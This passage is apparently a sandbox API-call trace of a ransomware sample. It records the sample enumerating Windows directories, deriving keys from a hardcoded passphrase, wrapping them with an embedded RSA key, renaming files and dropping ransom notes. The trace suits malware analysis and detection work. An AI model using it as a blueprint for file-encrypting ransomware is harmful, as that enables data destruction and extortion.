lpNewFileName="C:\\\\Boot\\zh-TW\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-tw\\bootmgr.exe.mui"), bFailIfExists=0) returned 0 [0231.820] SetFileAttributesA (lpFileName="C:\\\\Boot\\zh-TW\\bootmgr.exe.mui", dwFileAttributes=0x0) returned 0 [0231.821] DeleteFileA (lpFileName="C:\\\\Boot\\zh-TW\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\zh-tw\\bootmgr.exe.mui.gsg")) returned 0 [0231.821] MoveFileA (lpExistingFileName="C:\\\\Boot\\zh-TW\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-tw\\bootmgr.exe.mui"), lpNewFileName="C:\\\\Boot\\zh-TW\\bootmgr.exe.mui.fuck" (normalized: "c:\\boot\\zh-tw\\bootmgr.exe.mui.fuck")) returned 0 [0231.821] CryptDestroyHash (hHash=0x2716b68) returned 1 [0231.821] CryptDestroyKey (hKey=0x2716ce8) returned 1 [0231.821] CryptReleaseContext (hProv=0x27935c8, dwFlags=0x0) returned 1 [0231.821] FindNextFileA (in: hFindFile=0x2716aa8, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0231.821] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9f40c | out: lpSystemTimeAsFileTime=0x2b9f40c) [0231.821] GetLastError () returned 0x5 [0231.821] GetFileAttributesA (lpFileName="C:\\\\Boot\\zh-TW\\memtest.exe.mui" (normalized: "c:\\boot\\zh-tw\\memtest.exe.mui")) returned 0x20 [0231.821] SetFileAttributesA (lpFileName="C:\\\\Boot\\zh-TW\\memtest.exe.mui", dwFileAttributes=0x80) returned 0 [0231.822] CreateFileA (lpFileName="C:\\\\Boot\\zh-TW\\memtest.exe.mui" (normalized: "c:\\boot\\zh-tw\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.822] CreateFileA (lpFileName="C:\\\\Boot\\zh-TW\\memtest.exe.mui.gsg" (normalized: "c:\\boot\\zh-tw\\memtest.exe.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.822] SetFileAttributesA (lpFileName="C:\\\\Boot\\zh-TW\\memtest.exe.mui.gsg", dwFileAttributes=0x2) returned 0 [0231.822] CryptAcquireContextA (in: phProv=0x2b9e408, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9e408*=0x2793188) returned 1 [0231.830] CryptCreateHash (in: hProv=0x2793188, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9e40c | out: phHash=0x2b9e40c) returned 1 [0231.830] lstrlenA (lpString="CzcpzneZBYsNtiBMhLENKzVGzMlQm") returned 29 [0231.830] CryptHashData (hHash=0x2716b68, pbData=0x2ecaf8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0231.830] CryptDeriveKey (in: hProv=0x2793188, Algid=0x6610, hBaseData=0x2716b68, dwFlags=0x1000000, phKey=0x2b9e3f8 | out: phKey=0x2b9e3f8*=0x2716ce8) returned 1 [0231.830] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9e414, pcbBinary=0x2b9e3f4, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9e414, pcbBinary=0x2b9e3f4, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0231.830] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9e414, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9e3e8, pcbStructInfo=0x2b9e3f0 | out: pvStructInfo=0x2b9e3e8, pcbStructInfo=0x2b9e3f0) returned 1 [0231.830] CryptAcquireContextA (in: phProv=0x2b9e404, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9e404*=0x2792908) returned 1 [0231.832] CryptImportPublicKeyInfo (in: hCryptProv=0x2792908, dwCertEncodingType=0x1, pInfo=0x2796d68*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2796d98*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2796da0*, PublicKey.cUnusedBits=0x0), phKey=0x2b9e3fc | out: phKey=0x2b9e3fc*=0x2717428) returned 1 [0231.832] CryptEncrypt (in: hKey=0x2717428, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9e3ec*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9e3ec*=0x80) returned 1 [0231.833] CryptEncrypt (in: hKey=0x2717428, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2792a18*, pdwDataLen=0x2b9e400*=0x18, dwBufLen=0x80 | out: pbData=0x2792a18*, pdwDataLen=0x2b9e400*=0x80) returned 1 [0231.833] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2792a18, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0) returned 0 [0231.833] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2797f70, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9e410, lpOverlapped=0x0 | out: lpBuffer=0x2797f70, lpNumberOfBytesRead=0x2b9e410*=0x0, lpOverlapped=0x0) returned 0 [0231.833] CryptEncrypt (in: hKey=0x2716ce8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2797f70*, pdwDataLen=0x2b9e410*=0x0, dwBufLen=0x400 | out: pbData=0x2797f70*, pdwDataLen=0x2b9e410*=0x10) returned 1 [0231.833] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2797f70, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0) returned 0 [0231.833] CloseHandle (hObject=0xffffffff) returned 1 [0231.833] CloseHandle (hObject=0xffffffff) returned 1 [0231.833] CopyFileA (lpExistingFileName="C:\\\\Boot\\zh-TW\\memtest.exe.mui.gsg" (normalized: "c:\\boot\\zh-tw\\memtest.exe.mui.gsg"), lpNewFileName="C:\\\\Boot\\zh-TW\\memtest.exe.mui" (normalized: "c:\\boot\\zh-tw\\memtest.exe.mui"), bFailIfExists=0) returned 0 [0231.833] SetFileAttributesA (lpFileName="C:\\\\Boot\\zh-TW\\memtest.exe.mui", dwFileAttributes=0x0) returned 0 [0231.833] DeleteFileA (lpFileName="C:\\\\Boot\\zh-TW\\memtest.exe.mui.gsg" (normalized: "c:\\boot\\zh-tw\\memtest.exe.mui.gsg")) returned 0 [0231.834] MoveFileA (lpExistingFileName="C:\\\\Boot\\zh-TW\\memtest.exe.mui" (normalized: "c:\\boot\\zh-tw\\memtest.exe.mui"), lpNewFileName="C:\\\\Boot\\zh-TW\\memtest.exe.mui.fuck" (normalized: "c:\\boot\\zh-tw\\memtest.exe.mui.fuck")) returned 0 [0231.834] CryptDestroyHash (hHash=0x2716b68) returned 1 [0231.834] CryptDestroyKey (hKey=0x2716ce8) returned 1 [0231.834] CryptReleaseContext (hProv=0x2793188, dwFlags=0x0) returned 1 [0231.834] FindNextFileA (in: hFindFile=0x2716aa8, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0231.834] FindNextFileA (in: hFindFile=0x2716aa8, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 0 [0231.834] FindClose (in: hFindFile=0x2716aa8 | out: hFindFile=0x2716aa8) returned 1 [0231.834] GetFileAttributesA (lpFileName="C:\\\\Boot\\zh-TW\\README_BACK_FILES.htm" (normalized: "c:\\boot\\zh-tw\\readme_back_files.htm")) returned 0x20 [0231.835] FindNextFileA (in: hFindFile=0x394b28, lpFindFileData=0x2b9f898 | out: lpFindFileData=0x2b9f898) returned 0 [0231.835] FindClose (in: hFindFile=0x394b28 | out: hFindFile=0x394b28) returned 1 [0231.835] GetFileAttributesA (lpFileName="C:\\\\Boot\\README_BACK_FILES.htm" (normalized: "c:\\boot\\readme_back_files.htm")) returned 0x20 [0231.835] FindNextFileA (in: hFindFile=0x394aa8, lpFindFileData=0x2b9fc34 | out: lpFindFileData=0x2b9fc34) returned 1 [0231.835] FindNextFileA (in: hFindFile=0x394aa8, lpFindFileData=0x2b9fc34 | out: lpFindFileData=0x2b9fc34) returned 1 [0231.835] FindNextFileA (in: hFindFile=0x394aa8, lpFindFileData=0x2b9fc34 | out: lpFindFileData=0x2b9fc34) returned 1 [0231.835] FindNextFileA (in: hFindFile=0x394aa8, lpFindFileData=0x2b9fc34 | out: lpFindFileData=0x2b9fc34) returned 1 [0231.835] FindFirstFileA (in: lpFileName="C:\\\\Config.Msi\\*.*", lpFindFileData=0x2b9f898 | out: lpFindFileData=0x2b9f898) returned 0xffffffff [0231.837] GetFileAttributesA (lpFileName="C:\\\\Config.Msi\\README_BACK_FILES.htm" (normalized: "c:\\config.msi\\readme_back_files.htm")) returned 0xffffffff [0231.837] AreFileApisANSI () returned 1 [0231.837] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x39bfa8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 37 [0231.837] CreateFileW (lpFileName="C:\\\\Config.Msi\\README_BACK_FILES.htm" (normalized: "c:\\config.msi\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9fa1c, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.837] GetLastError () returned 0x5 [0231.837] GetLastError () returned 0x5 [0231.837] FindNextFileA (in: hFindFile=0x394aa8, lpFindFileData=0x2b9fc34 | out: lpFindFileData=0x2b9fc34) returned 1 [0231.837] FindFirstFileA (in: lpFileName="C:\\\\Documents and Settings\\*.*", lpFindFileData=0x2b9f898 | out: lpFindFileData=0x2b9f898) returned 0xffffffff [0231.837] GetFileAttributesA (lpFileName="C:\\\\Documents and Settings\\README_BACK_FILES.htm" (normalized: "c:\\documents and settings\\readme_back_files.htm")) returned 0x20 [0231.838] FindNextFileA (in: hFindFile=0x394aa8, lpFindFileData=0x2b9fc34 | out: lpFindFileData=0x2b9fc34) returned 1 [0231.838] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9fb44 | out: lpSystemTimeAsFileTime=0x2b9fb44) [0231.838] GetLastError () returned 0x5 [0231.838] GetFileAttributesA (lpFileName="C:\\\\hiberfil.sys" (normalized: "c:\\hiberfil.sys")) returned 0xffffffff [0231.838] SetFileAttributesA (lpFileName="C:\\\\hiberfil.sys", dwFileAttributes=0x80) returned 0 [0231.839] CreateFileA (lpFileName="C:\\\\hiberfil.sys" (normalized: "c:\\hiberfil.sys"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.839] CreateFileA (lpFileName="C:\\\\hiberfil.sys.gsg" (normalized: "c:\\hiberfil.sys.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.839] SetFileAttributesA (lpFileName="C:\\\\hiberfil.sys.gsg", dwFileAttributes=0x2) returned 0 [0231.839] CryptAcquireContextA (in: phProv=0x2b9eb40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9eb40*=0x2792880) returned 1 [0231.847] CryptCreateHash (in: hProv=0x2792880, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9eb44 | out: phHash=0x2b9eb44) returned 1 [0231.847] lstrlenA (lpString="CzcpzneZBYsNtiBMhLENKzVGzMlQm") returned 29 [0231.847] CryptHashData (hHash=0x2716aa8, pbData=0x2ecaa8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0231.847] CryptDeriveKey (in: hProv=0x2792880, Algid=0x6610, hBaseData=0x2716aa8, dwFlags=0x1000000, phKey=0x2b9eb30 | out: phKey=0x2b9eb30*=0x2716c68) returned 1 [0231.847] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9eb4c, pcbBinary=0x2b9eb2c, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9eb4c, pcbBinary=0x2b9eb2c, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0231.847] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9eb4c, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9eb20, pcbStructInfo=0x2b9eb28 | out: pvStructInfo=0x2b9eb20, pcbStructInfo=0x2b9eb28) returned 1 [0231.847] CryptAcquireContextA (in: phProv=0x2b9eb3c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9eb3c*=0x27934b8) returned 1 [0231.849] CryptImportPublicKeyInfo (in: hCryptProv=0x27934b8, dwCertEncodingType=0x1, pInfo=0x2796bc8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2796bf8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2796c00*, PublicKey.cUnusedBits=0x0), phKey=0x2b9eb34 | out: phKey=0x2b9eb34*=0x2716ce8) returned 1 [0231.849] CryptEncrypt (in: hKey=0x2716ce8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9eb24*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9eb24*=0x80) returned 1 [0231.849] CryptEncrypt (in: hKey=0x2716ce8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2792aa0*, pdwDataLen=0x2b9eb38*=0x18, dwBufLen=0x80 | out: pbData=0x2792aa0*, pdwDataLen=0x2b9eb38*=0x80) returned 1 [0231.849] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2792aa0, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9eb48, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9eb48, lpOverlapped=0x0) returned 0 [0231.849] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2778ae0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9eb48, lpOverlapped=0x0 | out: lpBuffer=0x2778ae0, lpNumberOfBytesRead=0x2b9eb48*=0x0, lpOverlapped=0x0) returned 0 [0231.849] CryptEncrypt (in: hKey=0x2716c68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2778ae0*, pdwDataLen=0x2b9eb48*=0x0, dwBufLen=0x400 | out: pbData=0x2778ae0*, pdwDataLen=0x2b9eb48*=0x10) returned 1 [0231.850] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2778ae0, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9eb48, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9eb48, lpOverlapped=0x0) returned 0 [0231.850] CloseHandle (hObject=0xffffffff) returned 1 [0231.850] CloseHandle (hObject=0xffffffff) returned 1 [0231.850] CopyFileA (lpExistingFileName="C:\\\\hiberfil.sys.gsg" (normalized: "c:\\hiberfil.sys.gsg"), lpNewFileName="C:\\\\hiberfil.sys" (normalized: "c:\\hiberfil.sys"), bFailIfExists=0) returned 0 [0231.850] SetFileAttributesA (lpFileName="C:\\\\hiberfil.sys", dwFileAttributes=0xfffff7cc) returned 0 [0231.850] DeleteFileA (lpFileName="C:\\\\hiberfil.sys.gsg" (normalized: "c:\\hiberfil.sys.gsg")) returned 0 [0231.850] MoveFileA (lpExistingFileName="C:\\\\hiberfil.sys" (normalized: "c:\\hiberfil.sys"), lpNewFileName="C:\\\\hiberfil.sys.fuck" (normalized: "c:\\hiberfil.sys.fuck")) returned 0 [0231.851] CryptDestroyHash (hHash=0x2716aa8) returned 1 [0231.851] CryptDestroyKey (hKey=0x2716c68) returned 1 [0231.851] CryptReleaseContext (hProv=0x2792880, dwFlags=0x0) returned 1 [0231.851] FindNextFileA (in: hFindFile=0x394aa8, lpFindFileData=0x2b9fc34 | out: lpFindFileData=0x2b9fc34) returned 1 [0231.851] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9fb44 | out: lpSystemTimeAsFileTime=0x2b9fb44) [0231.851] GetLastError () returned 0x20 [0231.851] GetFileAttributesA (lpFileName="C:\\\\pagefile.sys" (normalized: "c:\\pagefile.sys")) returned 0xffffffff [0231.851] SetFileAttributesA (lpFileName="C:\\\\pagefile.sys", dwFileAttributes=0x80) returned 0 [0231.851] CreateFileA (lpFileName="C:\\\\pagefile.sys" (normalized: "c:\\pagefile.sys"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.852] CreateFileA (lpFileName="C:\\\\pagefile.sys.gsg" (normalized: "c:\\pagefile.sys.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.852] SetFileAttributesA (lpFileName="C:\\\\pagefile.sys.gsg", dwFileAttributes=0x2) returned 0 [0231.852] CryptAcquireContextA (in: phProv=0x2b9eb40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9eb40*=0x2792b28) returned 1 [0231.860] CryptCreateHash (in: hProv=0x2792b28, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9eb44 | out: phHash=0x2b9eb44) returned 1 [0231.860] lstrlenA (lpString="CzcpzneZBYsNtiBMhLENKzVGzMlQm") returned 29 [0231.860] CryptHashData (hHash=0x2716aa8, pbData=0x2ec800, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0231.860] CryptDeriveKey (in: hProv=0x2792b28, Algid=0x6610, hBaseData=0x2716aa8, dwFlags=0x1000000, phKey=0x2b9eb30 | out: phKey=0x2b9eb30*=0x2716c68) returned 1 [0231.860] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9eb4c, pcbBinary=0x2b9eb2c, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9eb4c, pcbBinary=0x2b9eb2c, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0231.860] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9eb4c, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9eb20, pcbStructInfo=0x2b9eb28 | out: pvStructInfo=0x2b9eb20, pcbStructInfo=0x2b9eb28) returned 1 [0231.860] CryptAcquireContextA (in: phProv=0x2b9eb3c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9eb3c*=0x27933a8) returned 1 [0231.862] CryptImportPublicKeyInfo (in: hCryptProv=0x27933a8, dwCertEncodingType=0x1, pInfo=0x2796af8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2796b28*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2796b30*, PublicKey.cUnusedBits=0x0), phKey=0x2b9eb34 | out: phKey=0x2b9eb34*=0x27175a8) returned 1 [0231.862] CryptEncrypt (in: hKey=0x27175a8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9eb24*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9eb24*=0x80) returned 1 [0231.862] CryptEncrypt (in: hKey=0x27175a8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2792bb0*, pdwDataLen=0x2b9eb38*=0x18, dwBufLen=0x80 | out: pbData=0x2792bb0*, pdwDataLen=0x2b9eb38*=0x80) returned 1 [0231.862] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2792bb0, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9eb48, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9eb48, lpOverlapped=0x0) returned 0 [0231.862] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2778ae0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9eb48, lpOverlapped=0x0 | out: lpBuffer=0x2778ae0, lpNumberOfBytesRead=0x2b9eb48*=0x0, lpOverlapped=0x0) returned 0 [0231.862] CryptEncrypt (in: hKey=0x2716c68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2778ae0*, pdwDataLen=0x2b9eb48*=0x0, dwBufLen=0x400 | out: pbData=0x2778ae0*, pdwDataLen=0x2b9eb48*=0x10) returned 1 [0231.862] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2778ae0, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9eb48, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9eb48, lpOverlapped=0x0) returned 0 [0231.862] CloseHandle (hObject=0xffffffff) returned 1 [0231.862] CloseHandle (hObject=0xffffffff) returned 1 [0231.863] CopyFileA (lpExistingFileName="C:\\\\pagefile.sys.gsg" (normalized: "c:\\pagefile.sys.gsg"), lpNewFileName="C:\\\\pagefile.sys" (normalized: "c:\\pagefile.sys"), bFailIfExists=0) returned 0 [0231.863] SetFileAttributesA (lpFileName="C:\\\\pagefile.sys", dwFileAttributes=0xfffff7cc) returned 0 [0231.863] DeleteFileA (lpFileName="C:\\\\pagefile.sys.gsg" (normalized: "c:\\pagefile.sys.gsg")) returned 0 [0231.863] MoveFileA (lpExistingFileName="C:\\\\pagefile.sys" (normalized: "c:\\pagefile.sys"), lpNewFileName="C:\\\\pagefile.sys.fuck" (normalized: "c:\\pagefile.sys.fuck")) returned 0 [0231.863] CryptDestroyHash (hHash=0x2716aa8) returned 1 [0231.863] CryptDestroyKey (hKey=0x2716c68) returned 1 [0231.863] CryptReleaseContext (hProv=0x2792b28, dwFlags=0x0) returned 1 [0231.864] FindNextFileA (in: hFindFile=0x394aa8, lpFindFileData=0x2b9fc34 | out: lpFindFileData=0x2b9fc34) returned 1 [0231.864] FindFirstFileA (in: lpFileName="C:\\\\PerfLogs\\*.*", lpFindFileData=0x2b9f898 | out: lpFindFileData=0x2b9f898) returned 0xffffffff [0231.864] GetFileAttributesA (lpFileName="C:\\\\PerfLogs\\README_BACK_FILES.htm" (normalized: "c:\\perflogs\\readme_back_files.htm")) returned 0xffffffff [0231.864] AreFileApisANSI () returned 1 [0231.864] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x39c408, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 35 [0231.864] CreateFileW (lpFileName="C:\\\\PerfLogs\\README_BACK_FILES.htm" (normalized: "c:\\perflogs\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9fa1c, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.864] GetLastError () returned 0x5 [0231.864] GetLastError () returned 0x5 [0231.864] FindNextFileA (in: hFindFile=0x394aa8, lpFindFileData=0x2b9fc34 | out: lpFindFileData=0x2b9fc34) returned 1 [0231.864] FindNextFileA (in: hFindFile=0x394aa8, lpFindFileData=0x2b9fc34 | out: lpFindFileData=0x2b9fc34) returned 1 [0231.864] FindNextFileA (in: hFindFile=0x394aa8, lpFindFileData=0x2b9fc34 | out: lpFindFileData=0x2b9fc34) returned 1 [0231.864] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\*.*", lpFindFileData=0x2b9f898 | out: lpFindFileData=0x2b9f898) returned 0x2716aa8 [0231.865] FindNextFileA (in: hFindFile=0x2716aa8, lpFindFileData=0x2b9f898 | out: lpFindFileData=0x2b9f898) returned 1 [0231.865] FindNextFileA (in: hFindFile=0x2716aa8, lpFindFileData=0x2b9f898 | out: lpFindFileData=0x2b9f898) returned 1 [0231.865] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Adobe\\*.*", lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 0x2716c68 [0231.866] FindNextFileA (in: hFindFile=0x2716c68, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0231.866] FindNextFileA (in: hFindFile=0x2716c68, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0231.866] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Adobe\\ARM\\*.*", lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 0x2716b68 [0231.867] FindNextFileA (in: hFindFile=0x2716b68, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0231.867] FindNextFileA (in: hFindFile=0x2716b68, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0231.867] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Adobe\\ARM\\Reader_15.007.20033\\*.*", lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0x2717568 [0231.869] FindNextFileA (in: hFindFile=0x2717568, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0231.869] FindNextFileA (in: hFindFile=0x2717568, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0231.869] FindNextFileA (in: hFindFile=0x2717568, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0 [0231.869] FindClose (in: hFindFile=0x2717568 | out: hFindFile=0x2717568) returned 1 [0231.869] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Adobe\\ARM\\Reader_15.007.20033\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\adobe\\arm\\reader_15.007.20033\\readme_back_files.htm")) returned 0x20 [0231.870] FindNextFileA (in: hFindFile=0x2716b68, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0231.870] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Adobe\\ARM\\Reader_15.023.20070\\*.*", lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0x2717728 [0231.871] FindNextFileA (in: hFindFile=0x2717728, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0231.871] FindNextFileA (in: hFindFile=0x2717728, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0231.871] FindNextFileA (in: hFindFile=0x2717728, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0 [0231.871] FindClose (in: hFindFile=0x2717728 | out: hFindFile=0x2717728) returned 1 [0231.871] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Adobe\\ARM\\Reader_15.023.20070\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\adobe\\arm\\reader_15.023.20070\\readme_back_files.htm")) returned 0x20 [0231.872] FindNextFileA (in: hFindFile=0x2716b68, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0231.872] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Adobe\\ARM\\Reader_17.009.20058\\*.*", lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0x27174a8 [0231.872] FindNextFileA (in: hFindFile=0x27174a8, lpFindFileData=0x2b9edc4 | out: 